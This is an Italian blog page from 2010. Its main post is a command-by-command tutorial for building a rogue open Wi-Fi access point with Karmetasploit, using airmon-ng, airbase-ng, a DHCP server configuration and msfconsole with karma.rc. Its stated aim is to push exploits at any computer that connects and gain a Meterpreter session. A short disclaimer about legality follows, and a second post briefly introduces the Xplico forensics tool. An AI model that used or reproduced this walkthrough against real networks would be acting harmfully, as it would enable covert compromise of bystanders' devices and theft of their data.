martedì 9 marzo 2010

Fake AP con Karmetasploit

Ci sono vari modi per creare un AP falso, che potrebbe essere utile per fare delle prove per testare le keys wep o wpa. Nel tool di Gerix-Wifi-Cracker c'è una opzione che permette di creare un AP falso impostando il tipo di crittografia e la password, ovviamente dovreste avere almeno due scheda wireless, una serve per creare l'AP l'altra per craccarlo. Potremo anche crearlo personalmente seguendo questa guida presa dal forum italiano di remote-exploit Come creare un AP falso con tua scheda wifi, vediamo ora come crearlo con karmetasploit un tool sviluppato dallo stesso team di metasploit, karma creerà un fake AP senza password quindi open che chiunque potrà collegarsi, quando un pc si collegherà all'AP karma invierà una serie di exploits nel pc vittima per ottenere una sessione di meterpreter. Passiamo ora all'installazione e configurazione di karma!

Scarichiamo karma dal sito di metasploit

root@morfes:/opt/metasploit3/msf3# wget "http://metasploit.com/users/hdm/tools/karma.rc"
--2009-05-04 18:43:26-- http://metasploit.com/users/hdm/tools/karma.rc
Resolving metasploit.com... 66.240.213.81
Connecting to metasploit.com|66.240.213.81|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1088 (1.1K) [text/plain]
Saving to: `karma.rc'

100%[============================================================================>] 1,088 --.-K/s in 0s

(88.7 MB/s) - `karma.rc' saved [1088/1088]



modifichiamo il file dhcp.conf inserendo questi comandi, ah prima facciamo un backup del file

root@morfes:~# nano /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}


installiamo dei requisiti che servono a karma

root@morfes:~# gem install activerecord sqlite3-ruby
Successfully installed activerecord-2.3.2
Building native extensions. This could take a while...
Successfully installed sqlite3-ruby-1.2.4
2 gems installed
Installing ri documentation for activerecord-2.3.2...
Installing ri documentation for sqlite3-ruby-1.2.4...
Installing RDoc documentation for activerecord-2.3.2...
Installing RDoc documentation for sqlite3-ruby-1.2.4...


mettiamo in modalità monitor con airmon-ng una delle nostre schede wifi e avviamo airbase-ng per creare l'AP falso

root@morfes:~# airmon-ng


Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]



root@morfes:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)



root@morfes:~# airbase-ng -P -C 30 -e "Morfes" -v mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on ath1 to 1800
22:52:25 Access Point with BSSID 00:1A:4D:49:0B:26 started.


impostiamo l'ip per la nostra nuova interfaccia di rete at0 e attiviamo il DHCP Server

root@morfes:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@morfes:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@morfes:~# ps aux | grep dhcpd
dhcpd 6490 0.0 0.1 3812 1840 ? Ss 22:55 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root 6493 0.0 0.0 3232 788 pts/0 S+ 22:55 0:00 grep dhcpd


e infine avviamo karma

root@morfes:/opt/metasploit3/msf3# ./msfconsole -r karma.rc


Vi ricordo che questo è un tutorial dimostrativo, tutto ciò deve essere fatto nella vostra rete lan! Vi ricordo inoltre che entrare in una rete wifi altrui anche se open è illegale, anche perchè come dimostrato nell'articolo se entrate in una rete wifi open creata da qualche cracker potete diventare delle possibile vittime! :)




sabato 6 marzo 2010

Xplico

Xplico ora è anche su backtrack! Xplico è un Network Forensic Analysis Tool (NFAT), ovvero un software che riesce a ricostruire i contenuti dei pacchetti catturati tramite l'utilizzo di packet sniffer come Wireshark e Tcpdump o anche con Xplico stesso, infatti Xplico oltre che ricostruire i pacchetti pcap ha pure la funzione di sniffer. Xplico riesce a ricostruire tutti i dati trasportati dai protocolli come HTTP, IMAP, POP, SMTP, SIP "voip", FTP e TELNET, anche ricostruire le email scambiate e le chat come facebook. Il software è sviluppato da Gianluca Costa e Andrea de Franceschi, rilasciato sotto licenza Open Source ed è installabile solo su Linux. Per avere maggiori informazioni su come installarlo su altre distro linux visitate il wiki del sito ufficiale di Xplico. Tramite il mio video vi faccio vedere come installarlo su backtrack e come funziona con un semplice esempio di sniffer del protocollo HTTP tramite la sua interfaccia web.